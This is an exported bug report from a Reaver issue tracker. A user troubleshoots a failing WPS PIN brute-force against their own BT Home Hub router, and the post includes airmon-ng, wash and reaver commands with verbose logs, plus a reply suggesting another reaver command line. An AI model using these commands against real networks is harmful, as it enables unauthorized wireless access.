Supplied full pin but Reaver doesnt succeed

[GoogleCodeExporter]

Hi All,

I am new to using Reaver, but have done a lot of reading and research into it's 
use. I am trying to crack my own BT Home Hub 3b (UK). However I am seeing some 
strange behaviour, some background first:

WiFi Adapter - ALFA AWUS036NHA (Atheros AR9271) in monitor mode
Linux Version - Kali latest distro from Kali website (January 2015) 
kali-linux-1.0.9a 64bit
Reaver Version - 1.4

My router has WPS enabled and is not locked. I have run the following commands 

airmon-ng start wlan0
Kill 3 processes running (NetworkManager and 

wash -i mon0

BSSID                         Channel     RSSI     WPS Version       WPS Locked 
       ESSID
28:3C:E4:36:46:5F      11              -42        1.0                       No  
                     [NetworkName]

I then open a new terminal window and have tried the following few reaver 
commands (not at the same time).

Firstly, I tried to see if Reaver actually gets the WPA when I pass it the full 
know WPS pin, I run it with the actual WPS pin using the following command:

 # reaver -i mon0 -c 11 -b 28:3C:E4:36:46:5F -d 5 -p 86890281  -vv

Output is this, it just loops for ages.. surely by giving it the full pin it 
should find it almost instantly?

 [+] Switching mon0 to channel 11
 [+] Waiting for beacon from 28:3C:E4:36:46:5F
 [+] Associated with 28:3C:E4:36:46:5F (ESSID: [NetworkName])
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86890281
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK

I then tried running Reaver using the following command (first 4 digits of the 
pin, and some extra options that proved successful for others):
reaver -i mon0 -c 11 -b 28:3C:E4:36:46:5F -d 5 -r 3:15 -x 360 -T .5 -S -N -t 10 
-w -vv -L -p 8689

This went on for about 12 hours and got to 99.99% but just loops on the last 
pin (which is wrong):

 [+] Trying pin 86899987
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] Trying pin 86899987
 [+] Sending EAPOL START request
 [+] Received identity request
 [+] Sending identity response
 [+] Received M1 message
 [+] Sending M2 message
 [+] Received M3 message
 [+] Sending M4 message
 [+] Received WSC NACK
 [+] Sending WSC NACK
 [+] 99.99% complete @ 2015-01-27 07:15:25 (7 seconds/pin)
 [+] Max time remaining at this rate: 0:00:07 (1 pins left to try)

Any ideas on what to try next?

I have read through the Wiki/Q&A but not got much further.

Sorry if this seems like a bit of a dumb problem, we all have to start 
somewhere..

Original issue reported on code.google.com by christop...@gmail.com on 27 Jan 2015 at 8:13

[GoogleCodeExporter]

I think I saw this command somewhere else. It appears to work 

reaver -i mon0 -a -b 55:44:33:22:11:00 -r 3:15 -E -S -vv -N -T 1 -t 20 -d 0 -x 
30

Original comment by fraf...@gmail.com on 25 Feb 2015 at 9:44